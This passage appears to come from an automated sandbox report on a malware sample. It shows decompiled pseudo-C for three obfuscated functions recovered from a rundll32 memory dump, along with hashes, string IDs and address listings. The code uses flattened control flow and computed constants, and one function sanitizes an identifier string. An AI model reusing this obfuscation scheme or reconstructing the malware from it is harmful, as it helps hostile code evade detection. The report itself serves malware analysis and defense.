                                                                                                                          0x007a6b06
                                                                                                                          0x00000000
                                                                                                                          0x007a6a90
                                                                                                                          0x007a6a90
                                                                                                                          0x007a6a92
                                                                                                                          0x007a6a98
                                                                                                                          0x007a6aa1
                                                                                                                          0x007a6aa9
                                                                                                                          0x007a6aba
                                                                                                                          0x007a6ad2
                                                                                                                          0x007a6ae5
                                                                                                                          0x007a6af7
                                                                                                                          0x007a6afc
                                                                                                                          0x007a6aff
                                                                                                                          0x00000000
                                                                                                                          0x007a6aff
                                                                                                                          0x007a6a92
                                                                                                                          0x007a6a8e
                                                                                                                          0x00000000
                                                                                                                          0x007a6a82
                                                                                                                          0x007a6b8e
                                                                                                                          0x007a6b99
                                                                                                                          0x007a6b9a
                                                                                                                          0x007a6ba9
                                                                                                                          0x007a6bae
                                                                                                                          0x007a6bb1
                                                                                                                          0x007a6bb3
                                                                                                                          0x007a6bb3
                                                                                                                          0x007a6bb3
                                                                                                                          0x007a6bc5

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: <E$?c3$Md$a@$yw
                                                                                                                          • API String ID: 0-2084988834
                                                                                                                          • Opcode ID: cc47e4be658624a2c5b84ac9b559632d292d0301f4de702dae6f5b5aebd65e58
                                                                                                                          • Instruction ID: ca89ce471456ee2e56f065f6efb4d7b87356042a708fad511d51e356240dceb8
                                                                                                                          • Opcode Fuzzy Hash: cc47e4be658624a2c5b84ac9b559632d292d0301f4de702dae6f5b5aebd65e58
                                                                                                                          • Instruction Fuzzy Hash: 0EC122724083809FD768CF25D58A81BBBF1FBD4758F108A1DF5A696260D3B98909CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A0001 Relevance: 6.4, Strings: 5, Instructions: 191COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E007A0001(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				void* _t154;
				void* _t174;
				char _t178;
				void* _t183;
				char* _t189;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int* _t220;

				_push(_a4);
				_t209 = __edx;
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t154);
				_v132 = _v132 & 0x00000000;
				_t220 =  &(( &_v204)[3]);
				_v140 = 0x6f537b;
				_v136 = 0x2895cf;
				_t183 = 0xf669bfa;
				_v164 = 0xc3509d;
				_v164 = _v164 >> 0xf;
				_v164 = _v164 ^ 0x0007728b;
				_v188 = 0x58efa0;
				_v188 = _v188 + 0xffff9444;
				_t210 = 0x2f;
				_v188 = _v188 / _t210;
				_v188 = _v188 ^ 0x000ac4b2;
				_v176 = 0xa783cc;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0x73295065;
				_v176 = _v176 ^ 0xed239367;
				_v148 = 0x42262a;
				_v148 = _v148 | 0x228e56d6;
				_v148 = _v148 ^ 0x22cd87d0;
				_v204 = 0xc47428;
				_v204 = _v204 + 0xffff2e33;
				_v204 = _v204 + 0xffff2fa2;
				_v204 = _v204 + 0xffff28a7;
				_v204 = _v204 ^ 0x00c63754;
				_v156 = 0x11bd56;
				_t211 = 0x5c;
				_v156 = _v156 * 0x6a;
				_v156 = _v156 ^ 0x0752342f;
				_v172 = 0x489beb;
				_v172 = _v172 + 0xfe21;
				_v172 = _v172 / _t211;
				_v172 = _v172 ^ 0x0000a4d4;
				_v192 = 0x2e5859;
				_v192 = _v192 ^ 0x83ba67d9;
				_t212 = 0x44;
				_v192 = _v192 / _t212;
				_v192 = _v192 ^ 0x01e00d99;
				_v180 = 0x89bc6d;
				_v180 = _v180 | 0xb1d25d45;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xff5cc309;
				_v168 = 0x19805c;
				_t213 = 0x18;
				_v168 = _v168 * 0x16;
				_v168 = _v168 ^ 0x4d2845a5;
				_v168 = _v168 ^ 0x4f1adce1;
				_v196 = 0x9cfdcd;
				_v196 = _v196 / _t213;
				_v196 = _v196 + 0xd8a6;
				_v196 = _v196 ^ 0x0005e56c;
				_v200 = 0x1d77da;
				_t214 = 0x6b;
				_v200 = _v200 / _t214;
				_t215 = 9;
				_v200 = _v200 / _t215;
				_t216 = 0x59;
				_v200 = _v200 / _t216;
				_v200 = _v200 ^ 0x00052bad;
				_v184 = 0x474669;
				_v184 = _v184 * 0x25;
				_v184 = _v184 + 0xffff8141;
				_v184 = _v184 ^ 0x0a4cf000;
				_v160 = 0x98ddfb;
				_v160 = _v160 << 3;
				_v160 = _v160 ^ 0x04cf55b1;
				_v152 = 0xbbc225;
				_v152 = _v152 * 0x58;
				_v152 = _v152 ^ 0x408ec409;
				while(_t183 != 0x4a2a3c4) {
					if(_t183 == 0x640e5f9) {
						__eflags = _v128;
						_t189 =  &_v128;
						while(__eflags != 0) {
							_t178 =  *_t189;
							__eflags = _t178 - 0x30;
							if(_t178 < 0x30) {
								L10:
								__eflags = _t178 - 0x61;
								if(_t178 < 0x61) {
									L12:
									__eflags = _t178 - 0x41;
									if(_t178 < 0x41) {
										L14:
										 *_t189 = 0x58;
									} else {
										__eflags = _t178 - 0x5a;
										if(_t178 > 0x5a) {
											goto L14;
										}
									}
								} else {
									__eflags = _t178 - 0x7a;
									if(_t178 > 0x7a) {
										goto L12;
									}
								}
							} else {
								__eflags = _t178 - 0x39;
								if(_t178 > 0x39) {
									goto L10;
								}
							}
							_t189 = _t189 + 1;
							__eflags =  *_t189;
						}
						_t183 = 0x4a2a3c4;
						continue;
					} else {
						if(_t183 == 0x7562914) {
							_v144 = 0x80;
							_t178 = E0079CD29(_v164,  &_v144, _v176,  &_v128);
							_t220 =  &(_t220[3]);
							_t183 = 0x640e5f9;
							continue;
						} else {
							if(_t183 == 0xf669bfa) {
								_t183 = 0x7562914;
								continue;
							}
						}
					}
					L18:
					__eflags = _t183 - 0x1718ff4;
					if(__eflags != 0) {
						continue;
					}
					return _t178;
				}
				_push(_v172);
				_push(_v156);
				_push(_v204);
				_t174 = E007A8606(_v148, 0x791690, __eflags);
				E00792206( &_v128, _t209, _v196, _v200, _t174, E0079EE81(__eflags), _v184);
				_t178 = E0079A8B0(_v160, _t174, _v152);
				_t220 =  &(_t220[0xb]);
				_t183 = 0x1718ff4;
				goto L18;
			}





































                                                                                                                          0x007a000b
                                                                                                                          0x007a0012
                                                                                                                          0x007a0014
                                                                                                                          0x007a0015
                                                                                                                          0x007a0016
                                                                                                                          0x007a001b
                                                                                                                          0x007a0020
                                                                                                                          0x007a0023
                                                                                                                          0x007a002d
                                                                                                                          0x007a0035
                                                                                                                          0x007a003a
                                                                                                                          0x007a0042
                                                                                                                          0x007a0047
                                                                                                                          0x007a004f
                                                                                                                          0x007a0057
                                                                                                                          0x007a0065
                                                                                                                          0x007a006a
                                                                                                                          0x007a0070
                                                                                                                          0x007a0078
                                                                                                                          0x007a0080
                                                                                                                          0x007a0085
                                                                                                                          0x007a008d
                                                                                                                          0x007a0095
                                                                                                                          0x007a009d
                                                                                                                          0x007a00a5
                                                                                                                          0x007a00ad
                                                                                                                          0x007a00b5
                                                                                                                          0x007a00bd
                                                                                                                          0x007a00c5
                                                                                                                          0x007a00cd
                                                                                                                          0x007a00d5
                                                                                                                          0x007a00e2
                                                                                                                          0x007a00e5
                                                                                                                          0x007a00e9
                                                                                                                          0x007a00f1
                                                                                                                          0x007a00f9
                                                                                                                          0x007a0109
                                                                                                                          0x007a010d
                                                                                                                          0x007a0115
                                                                                                                          0x007a011d
                                                                                                                          0x007a0129
                                                                                                                          0x007a012e
                                                                                                                          0x007a0134
                                                                                                                          0x007a013c
                                                                                                                          0x007a0144
                                                                                                                          0x007a014c
                                                                                                                          0x007a0151
                                                                                                                          0x007a0159
                                                                                                                          0x007a0166
                                                                                                                          0x007a0167
                                                                                                                          0x007a016b
                                                                                                                          0x007a0173
                                                                                                                          0x007a017b
                                                                                                                          0x007a0189
                                                                                                                          0x007a018d
                                                                                                                          0x007a0195
                                                                                                                          0x007a019f
                                                                                                                          0x007a01ad
                                                                                                                          0x007a01b2
                                                                                                                          0x007a01c1
                                                                                                                          0x007a01c6
                                                                                                                          0x007a01d5
                                                                                                                          0x007a01d8
                                                                                                                          0x007a01dc
                                                                                                                          0x007a01e4
                                                                                                                          0x007a01f1
                                                                                                                          0x007a01f5
                                                                                                                          0x007a01fd
                                                                                                                          0x007a0205
                                                                                                                          0x007a020d
                                                                                                                          0x007a0212
                                                                                                                          0x007a021a
                                                                                                                          0x007a0227
                                                                                                                          0x007a022b
                                                                                                                          0x007a0233
                                                                                                                          0x007a023d
                                                                                                                          0x007a0280
                                                                                                                          0x007a0285
                                                                                                                          0x007a0289
                                                                                                                          0x007a028b
                                                                                                                          0x007a028d
                                                                                                                          0x007a028f
                                                                                                                          0x007a0295
                                                                                                                          0x007a0295
                                                                                                                          0x007a0297
                                                                                                                          0x007a029d
                                                                                                                          0x007a029d
                                                                                                                          0x007a029f
                                                                                                                          0x007a02a5
                                                                                                                          0x007a02a5
                                                                                                                          0x007a02a1
                                                                                                                          0x007a02a1
                                                                                                                          0x007a02a3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a02a3
                                                                                                                          0x007a0299
                                                                                                                          0x007a0299
                                                                                                                          0x007a029b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a029b
                                                                                                                          0x007a0291
                                                                                                                          0x007a0291
                                                                                                                          0x007a0293
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a0293
                                                                                                                          0x007a02a8
                                                                                                                          0x007a02a9
                                                                                                                          0x007a02a9
                                                                                                                          0x007a02ae
                                                                                                                          0x00000000
                                                                                                                          0x007a023f
                                                                                                                          0x007a0241
                                                                                                                          0x007a0257
                                                                                                                          0x007a0271
                                                                                                                          0x007a0276
                                                                                                                          0x007a0279
                                                                                                                          0x00000000
                                                                                                                          0x007a0243
                                                                                                                          0x007a0249
                                                                                                                          0x007a024f
                                                                                                                          0x00000000
                                                                                                                          0x007a024f
                                                                                                                          0x007a0249
                                                                                                                          0x007a0241
                                                                                                                          0x007a030f
                                                                                                                          0x007a030f
                                                                                                                          0x007a0315
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a0325
                                                                                                                          0x007a0325
                                                                                                                          0x007a02b2
                                                                                                                          0x007a02bb
                                                                                                                          0x007a02bf
                                                                                                                          0x007a02c7
                                                                                                                          0x007a02f3
                                                                                                                          0x007a0302
                                                                                                                          0x007a0307
                                                                                                                          0x007a030a
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: *&B$YX.$eP)s$iFG${So
                                                                                                                          • API String ID: 0-3810143839
                                                                                                                          • Opcode ID: 48d2831e814e975817787d0fc3f0b7328e935c3bd0d47c2a6559cc3d7b45ea36
                                                                                                                          • Instruction ID: 1470164f7b01775f241155abe4c4230a8c5e0f5db4c8a1fa4ebec18eea187054
                                                                                                                          • Opcode Fuzzy Hash: 48d2831e814e975817787d0fc3f0b7328e935c3bd0d47c2a6559cc3d7b45ea36
                                                                                                                          • Instruction Fuzzy Hash: 028197B15093419BD7A8CF25D589A1FBBE2FBC6718F005A1DF185862A1D3B8C949CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00797735 Relevance: 6.4, Strings: 5, Instructions: 191COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E00797735(void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				void* _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* __ecx;
				void* _t163;
				signed int _t176;
				void* _t188;
				signed int _t205;
				signed int* _t207;
				void* _t209;
				void* _t210;

				_t186 = _a4;
				_t207 = _a8;
				_push(_a16);
				_push(_a12);
				_push(_t207);
				_push(_a4);
				_push(__edx);
				E007A20B9(_t163);
				_v60 = 0x524796;
				_t210 = _t209 + 0x18;
				asm("stosd");
				_t188 = 0x9c25eae;
				asm("stosd");
				asm("stosd");
				_v76 = 0x29f01;
				_v76 = _v76 | 0x94be009d;
				_v76 = _v76 ^ 0x94be9f9d;
				_v108 = 0xafa956;
				_v108 = _v108 + 0x628;
				_v108 = _v108 ^ 0xf539d3de;
				_v108 = _v108 ^ 0xf5927b2e;
				_v92 = 0x300c11;
				_v92 = _v92 ^ 0x95f7d427;
				_v92 = _v92 ^ 0x95c19bc8;
				_v116 = 0x7fd72e;
				_v116 = _v116 >> 0x10;
				_v116 = _v116 + 0x5d9b;
				_v116 = _v116 ^ 0x0001fda4;
				_v88 = 0x25a82f;
				_t205 = 0x1b;
				_v88 = _v88 * 0x72;
				_v88 = _v88 ^ 0x10cad58f;
				_v100 = 0xf91ce5;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x71d91e41;
				_v100 = _v100 ^ 0x71d9c87d;
				_v136 = 0x5a524;
				_v136 = _v136 ^ 0x65d544fc;
				_v136 = _v136 / _t205;
				_v136 = _v136 + 0xdad4;
				_v136 = _v136 ^ 0x03c43220;
				_v68 = 0xd5537a;
				_v68 = _v68 + 0xffffd52f;
				_v68 = _v68 ^ 0x00d2b66c;
				_v128 = 0x59397b;
				_v128 = _v128 ^ 0x5dfc0cc3;
				_v128 = _v128 + 0x56f6;
				_v128 = _v128 + 0xff83;
				_v128 = _v128 ^ 0x5dafd3d4;
				_v104 = 0x85edfa;
				_v104 = _v104 | 0x32b3baf7;
				_v104 = _v104 ^ 0x32b12396;
				_v112 = 0x4c4fc6;
				_v112 = _v112 + 0xbf9f;
				_v112 = _v112 >> 1;
				_v112 = _v112 ^ 0x002f2047;
				_v120 = 0xc21a43;
				_v120 = _v120 | 0x0781619f;
				_v120 = _v120 ^ 0x30a197e6;
				_v120 = _v120 ^ 0x376a3e6d;
				_v84 = 0xaf6a80;
				_v84 = _v84 + 0xffff12f3;
				_v84 = _v84 ^ 0x00ae6f5f;
				_v64 = 0x7bdfb0;
				_v64 = _v64 >> 2;
				_v64 = _v64 ^ 0x00114c08;
				_v96 = 0x6b35de;
				_v96 = _v96 * 0x60;
				_v96 = _v96 ^ 0x283b6418;
				_v124 = 0x52b9d2;
				_v124 = _v124 | 0x40c5122c;
				_v124 = _v124 << 8;
				_v124 = _v124 >> 0x10;
				_v124 = _v124 ^ 0x0001910d;
				_v132 = 0x44d0f9;
				_v132 = _v132 * 0x29;
				_v132 = _v132 + 0xf17;
				_v132 = _v132 * 0x65;
				_v132 = _v132 ^ 0x592f3fb2;
				_v72 = 0xc75ad6;
				_v72 = _v72 ^ 0xe0bef3a1;
				_v72 = _v72 ^ 0xe072572c;
				_v80 = 0xa6c1d6;
				_v80 = _v80 + 0xc8d;
				_v80 = _v80 ^ 0x00ac29a9;
				do {
					while(_t188 != 0xe27b71) {
						if(_t188 == 0x372e88b) {
							_push(_t188);
							_push(_t188);
							_t176 = E00797FF2(_t207[1]);
							 *_t207 = _t176;
							__eflags = _t176;
							if(__eflags != 0) {
								_t188 = 0xe27b71;
								continue;
							}
						} else {
							if(_t188 == 0x93f98fe) {
								_t207[1] = E007B0C14(_t186);
								_t188 = 0x372e88b;
								continue;
							} else {
								if(_t188 == 0x9c25eae) {
									_t188 = 0x93f98fe;
									 *_t207 =  *_t207 & 0x00000000;
									_t207[1] = _v76;
									continue;
								} else {
									if(_t188 == 0xa0c9f29) {
										_t146 =  &_v112; // 0x2f2047
										E007A0DAF(_v68,  &_v44, _v128,  *((intOrPtr*)(_t186 + 0x48)), _v104,  *_t146);
										_t210 = _t210 + 0x10;
										_t188 = 0xc7f60b3;
										continue;
									} else {
										if(_t188 == 0xc7f60b3) {
											_t144 =  &_v84; // 0xe072572c
											E007B0E3A( &_v44, _v120, __eflags,  *_t144, _v64, _v96, _t186 + 0x14);
											_t210 = _t210 + 0x10;
											_t188 = 0xcf8cba1;
											continue;
										} else {
											_t219 = _t188 - 0xcf8cba1;
											if(_t188 != 0xcf8cba1) {
												goto L17;
											} else {
												E007B0E3A( &_v44, _v124, _t219, _v132, _v72, _v80, _t186 + 0x38);
											}
										}
									}
								}
							}
						}
						L9:
						return 0 |  *_t207 != 0x00000000;
					}
					E00793DBC( &_v44, _t207, _v88, _v100, _v136);
					_t210 = _t210 + 0xc;
					_t188 = 0xa0c9f29;
					L17:
					__eflags = _t188 - 0x560a718;
				} while (__eflags != 0);
				goto L9;
			}

































                                                                                                                          0x0079773c
                                                                                                                          0x00797745
                                                                                                                          0x0079774d
                                                                                                                          0x00797754
                                                                                                                          0x0079775b
                                                                                                                          0x0079775c
                                                                                                                          0x0079775d
                                                                                                                          0x0079775f
                                                                                                                          0x00797764
                                                                                                                          0x00797772
                                                                                                                          0x00797775
                                                                                                                          0x00797778
                                                                                                                          0x0079777f
                                                                                                                          0x00797780
                                                                                                                          0x00797781
                                                                                                                          0x00797789
                                                                                                                          0x00797791
                                                                                                                          0x00797799
                                                                                                                          0x007977a1
                                                                                                                          0x007977a9
                                                                                                                          0x007977b1
                                                                                                                          0x007977b9
                                                                                                                          0x007977c1
                                                                                                                          0x007977c9
                                                                                                                          0x007977d1
                                                                                                                          0x007977d9
                                                                                                                          0x007977de
                                                                                                                          0x007977e6
                                                                                                                          0x007977ee
                                                                                                                          0x007977fb
                                                                                                                          0x007977fc
                                                                                                                          0x00797800
                                                                                                                          0x00797808
                                                                                                                          0x00797810
                                                                                                                          0x00797815
                                                                                                                          0x0079781d
                                                                                                                          0x00797825
                                                                                                                          0x0079782d
                                                                                                                          0x0079783b
                                                                                                                          0x0079783f
                                                                                                                          0x00797847
                                                                                                                          0x0079784f
                                                                                                                          0x00797857
                                                                                                                          0x0079785f
                                                                                                                          0x00797867
                                                                                                                          0x0079786f
                                                                                                                          0x00797877
                                                                                                                          0x0079787f
                                                                                                                          0x00797887
                                                                                                                          0x0079788f
                                                                                                                          0x00797897
                                                                                                                          0x0079789f
                                                                                                                          0x007978a7
                                                                                                                          0x007978af
                                                                                                                          0x007978b7
                                                                                                                          0x007978bb
                                                                                                                          0x007978c3
                                                                                                                          0x007978cb
                                                                                                                          0x007978d3
                                                                                                                          0x007978db
                                                                                                                          0x007978e3
                                                                                                                          0x007978eb
                                                                                                                          0x007978f3
                                                                                                                          0x007978fb
                                                                                                                          0x00797903
                                                                                                                          0x00797908
                                                                                                                          0x00797910
                                                                                                                          0x0079791d
                                                                                                                          0x00797921
                                                                                                                          0x0079792e
                                                                                                                          0x0079793b
                                                                                                                          0x00797943
                                                                                                                          0x00797948
                                                                                                                          0x0079794d
                                                                                                                          0x00797955
                                                                                                                          0x00797962
                                                                                                                          0x00797966
                                                                                                                          0x00797973
                                                                                                                          0x00797977
                                                                                                                          0x0079797f
                                                                                                                          0x00797987
                                                                                                                          0x0079798f
                                                                                                                          0x00797997
                                                                                                                          0x0079799f
                                                                                                                          0x007979a7
                                                                                                                          0x007979af
                                                                                                                          0x007979af
                                                                                                                          0x007979bd
                                                                                                                          0x00797aac
                                                                                                                          0x00797aad
                                                                                                                          0x00797aae
                                                                                                                          0x00797ab3
                                                                                                                          0x00797ab7
                                                                                                                          0x00797ab9
                                                                                                                          0x00797abf
                                                                                                                          0x00000000
                                                                                                                          0x00797abf
                                                                                                                          0x007979c3
                                                                                                                          0x007979c5
                                                                                                                          0x00797a90
                                                                                                                          0x00797a93
                                                                                                                          0x00000000
                                                                                                                          0x007979cb
                                                                                                                          0x007979d1
                                                                                                                          0x00797a7c
                                                                                                                          0x00797a7e
                                                                                                                          0x00797a81
                                                                                                                          0x00000000
                                                                                                                          0x007979d7
                                                                                                                          0x007979dd
                                                                                                                          0x00797a4f
                                                                                                                          0x00797a66
                                                                                                                          0x00797a6b
                                                                                                                          0x00797a6e
                                                                                                                          0x00000000
                                                                                                                          0x007979df
                                                                                                                          0x007979e5
                                                                                                                          0x00797a35
                                                                                                                          0x00797a3d
                                                                                                                          0x00797a42
                                                                                                                          0x00797a45
                                                                                                                          0x00000000
                                                                                                                          0x007979e7
                                                                                                                          0x007979e7
                                                                                                                          0x007979ed
                                                                                                                          0x00000000
                                                                                                                          0x007979f3
                                                                                                                          0x00797a0b
                                                                                                                          0x00797a10
                                                                                                                          0x007979ed
                                                                                                                          0x007979e5
                                                                                                                          0x007979dd
                                                                                                                          0x007979d1
                                                                                                                          0x007979c5
                                                                                                                          0x00797a13
                                                                                                                          0x00797a24
                                                                                                                          0x00797a24
                                                                                                                          0x00797ad8
                                                                                                                          0x00797add
                                                                                                                          0x00797ae0
                                                                                                                          0x00797ae5
                                                                                                                          0x00797ae5
                                                                                                                          0x00797ae5
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ,Wr$G /$m>j7$q{${9Y
                                                                                                                          • API String ID: 0-2956538602
                                                                                                                          • Opcode ID: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                          • Instruction ID: 0f81449b36d477e15feed3c0195c0f8bf8f103a98d9edd8963ef77e8bd69e616
                                                                                                                          • Opcode Fuzzy Hash: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                          • Instruction Fuzzy Hash: 89913E711093419FD768CF65E98A52BBBE1FBC4718F10991CF29296220D3B9CA49CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00794816 Relevance: 6.4, Strings: 5, Instructions: 180COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E00794816(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t164;
				void* _t179;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t196;
				void* _t213;
				void* _t214;
				signed int* _t217;

				_push(_a16);
				_t213 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t164);
				_v4 = _v4 & 0x00000000;
				_t217 =  &(( &_v88)[6]);
				_v16 = 0xc0a747;
				_v12 = 0xade381;
				_t214 = 0;
				_v8 = 0x11050f;
				_t196 = 0x5adc597;
				_v84 = 0xdf9e69;
				_v84 = _v84 >> 2;
				_v84 = _v84 + 0xffff5795;
				_v84 = _v84 >> 5;
				_v84 = _v84 ^ 0x0001b9f8;
				_v68 = 0xf2d8cd;
				_v68 = _v68 << 6;
				_v68 = _v68 | 0xe3b79c6a;
				_v68 = _v68 + 0xec5a;
				_v68 = _v68 ^ 0xffb8abc5;
				_v40 = 0x5d8c34;
				_v40 = _v40 >> 9;
				_v40 = _v40 ^ 0x40002ec6;
				_v28 = 0x37ca39;
				_v28 = _v28 | 0x456668c2;
				_v28 = _v28 ^ 0x0577eafb;
				_v80 = 0xd16358;
				_v80 = _v80 ^ 0xe637ce9d;
				_t190 = 0x68;
				_v80 = _v80 * 0x4b;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x965c2e63;
				_v56 = 0xfc1806;
				_v56 = _v56 + 0xffffb57d;
				_v56 = _v56 | 0x299c1b97;
				_v56 = _v56 ^ 0x29fc2736;
				_v44 = 0x81586;
				_v44 = _v44 | 0xba5390c4;
				_v44 = _v44 ^ 0xba584850;
				_v60 = 0x52e6aa;
				_v60 = _v60 >> 0xa;
				_v60 = _v60 * 0x28;
				_v60 = _v60 ^ 0x00066c4e;
				_v48 = 0x7a334;
				_v48 = _v48 + 0xfffff5af;
				_v48 = _v48 ^ 0x0009652d;
				_v52 = 0x3bf8e8;
				_v52 = _v52 / _t190;
				_v52 = _v52 ^ 0x00025bcb;
				_v64 = 0xacc490;
				_t191 = 0x6f;
				_v64 = _v64 / _t191;
				_v64 = _v64 ^ 0xce7acdce;
				_v64 = _v64 ^ 0xce756fa5;
				_v88 = 0x557b83;
				_v88 = _v88 ^ 0xfc4fd146;
				_v88 = _v88 ^ 0x87bb4e9a;
				_v88 = _v88 ^ 0x18fbc6ce;
				_v88 = _v88 ^ 0x635c68ef;
				_v24 = 0xa24557;
				_t192 = 0x23;
				_v24 = _v24 / _t192;
				_v24 = _v24 ^ 0x00019ec3;
				_v72 = 0x274d3f;
				_v72 = _v72 + 0x3236;
				_v72 = _v72 + 0x71a1;
				_v72 = _v72 + 0x1749;
				_v72 = _v72 ^ 0x0028bc49;
				_v32 = 0x96c762;
				_t193 = 0x44;
				_v32 = _v32 / _t193;
				_v32 = _v32 ^ 0x000b5918;
				_v76 = 0x2f082c;
				_v76 = _v76 + 0x52f3;
				_v76 = _v76 + 0x7ae4;
				_v76 = _v76 ^ 0x81d2744f;
				_v76 = _v76 ^ 0x81f68fa5;
				_v36 = 0x9357ce;
				_v36 = _v36 + 0xfffffb26;
				_v36 = _v36 ^ 0x009b03e6;
				do {
					while(_t196 != 0x4d42949) {
						if(_t196 == 0x5adc597) {
							_t196 = 0x4d42949;
							continue;
						} else {
							if(_t196 == 0x78e32ab) {
								E007A847F(_v24, _t213, _v28 | _v68, _v72, _a8, _v32, _t214, _v76, _v36,  &_v20);
							} else {
								if(_t196 != 0xf2775cd) {
									goto L11;
								} else {
									_push(_t196);
									_push(_t196);
									_t214 = E00797FF2(_v20 + _v20);
									if(_t214 != 0) {
										_t196 = 0x78e32ab;
										continue;
									}
								}
							}
						}
						L14:
						return _t214;
					}
					_t179 = E007A847F(_v80, _t213, _v40 | _v84, _v56, _a8, _v44, 0, _v60, _v48,  &_v20);
					_t217 =  &(_t217[8]);
					if(_t179 == 0) {
						_t196 = 0xc32537b;
						goto L11;
					} else {
						_t196 = 0xf2775cd;
						continue;
					}
					goto L14;
					L11:
				} while (_t196 != 0xc32537b);
				goto L14;
			}



































                                                                                                                          0x0079481d
                                                                                                                          0x00794821
                                                                                                                          0x00794823
                                                                                                                          0x00794827
                                                                                                                          0x0079482b
                                                                                                                          0x0079482f
                                                                                                                          0x00794830
                                                                                                                          0x00794831
                                                                                                                          0x00794836
                                                                                                                          0x0079483b
                                                                                                                          0x0079483e
                                                                                                                          0x00794848
                                                                                                                          0x00794850
                                                                                                                          0x00794852
                                                                                                                          0x0079485a
                                                                                                                          0x0079485f
                                                                                                                          0x00794867
                                                                                                                          0x0079486c
                                                                                                                          0x00794874
                                                                                                                          0x00794879
                                                                                                                          0x00794881
                                                                                                                          0x00794889
                                                                                                                          0x0079488e
                                                                                                                          0x00794896
                                                                                                                          0x0079489e
                                                                                                                          0x007948a6
                                                                                                                          0x007948ae
                                                                                                                          0x007948b3
                                                                                                                          0x007948bb
                                                                                                                          0x007948c3
                                                                                                                          0x007948cb
                                                                                                                          0x007948d3
                                                                                                                          0x007948db
                                                                                                                          0x007948ea
                                                                                                                          0x007948ed
